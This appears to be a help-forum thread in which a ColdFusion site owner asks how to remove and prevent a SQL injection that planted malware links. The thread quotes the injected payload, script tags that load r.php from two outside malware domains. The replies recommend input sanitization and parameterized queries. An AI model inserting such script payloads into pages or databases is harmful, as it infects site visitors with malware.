SQL injection attack on windows 2000 server, coldfusion site

  We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning?   Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
Who is Participating?
Big MontyConnect With a Mentor Senior Web Developer / CEO of ExchangeTree.org Commented:
that should take of it, unless you have other open avenues to your data
Big MontySenior Web Developer / CEO of ExchangeTree.org Commented:
to prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared sql queries:


it'll take some time but will ultimately save you these types of headaches when they occur.
jdinesAuthor Commented:
  My page is actually a Coldfusion page so I searched how to prevent sql injection in coldfusion and came up with this:


I have actually already updated the queries so will this take care of future problems? Thanks.
jdinesAuthor Commented:
Thank you very much!
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.